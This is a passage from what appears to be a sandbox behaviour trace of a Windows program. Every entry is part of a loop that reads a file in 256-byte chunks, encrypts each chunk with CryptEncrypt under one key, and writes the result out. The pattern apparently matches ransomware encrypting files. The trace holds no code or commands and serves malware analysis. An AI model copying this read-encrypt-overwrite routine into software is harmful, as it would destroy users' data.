pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.655] GetLastError () returned 0x0 [0148.655] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.655] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.656] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.656] GetLastError () returned 0x0 [0148.656] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.656] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.656] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.656] GetLastError () returned 0x0 [0148.656] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.656] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.656] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.656] GetLastError () returned 0x0 [0148.656] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.656] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.656] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.656] GetLastError () returned 0x0 [0148.656] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.656] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.656] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.656] GetLastError () returned 0x0 [0148.656] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.656] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.656] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.656] GetLastError () returned 0x0 [0148.656] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.656] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.656] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.657] GetLastError () returned 0x0 [0148.657] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.657] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.657] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.657] GetLastError () returned 0x0 [0148.657] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.657] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.657] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.657] GetLastError () returned 0x0 [0148.657] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.657] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.657] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.657] GetLastError () returned 0x0 [0148.657] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.657] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.657] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.657] GetLastError () returned 0x0 [0148.657] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.657] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.657] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.657] GetLastError () returned 0x0 [0148.657] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.657] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.657] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.657] GetLastError () returned 0x0 [0148.658] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.658] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.658] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.658] GetLastError () returned 0x0 [0148.658] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.658] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.658] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.658] GetLastError () returned 0x0 [0148.658] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.658] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.658] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.658] GetLastError () returned 0x0 [0148.658] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.658] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.658] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.658] GetLastError () returned 0x0 [0148.658] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.658] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.658] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.658] GetLastError () returned 0x0 [0148.658] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.658] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.658] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.658] GetLastError () returned 0x0 [0148.658] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.659] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.659] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.659] GetLastError () returned 0x0 [0148.659] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.659] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.659] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.659] GetLastError () returned 0x0 [0148.659] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.659] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.659] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.659] GetLastError () returned 0x0 [0148.659] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.659] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.659] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.659] GetLastError () returned 0x0 [0148.659] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.659] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.659] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.659] GetLastError () returned 0x0 [0148.659] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.659] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.659] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.659] GetLastError () returned 0x0 [0148.659] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.659] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.660] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.660] GetLastError () returned 0x0 [0148.660] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.660] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.660] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.660] GetLastError () returned 0x0 [0148.660] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.660] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.660] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.660] GetLastError () returned 0x0 [0148.660] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.660] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.660] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.660] GetLastError () returned 0x0 [0148.660] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.660] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.660] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.660] GetLastError () returned 0x0 [0148.660] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.660] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.660] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.660] GetLastError () returned 0x0 [0148.660] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.660] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.660] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.660] GetLastError () returned 0x0 [0148.661] 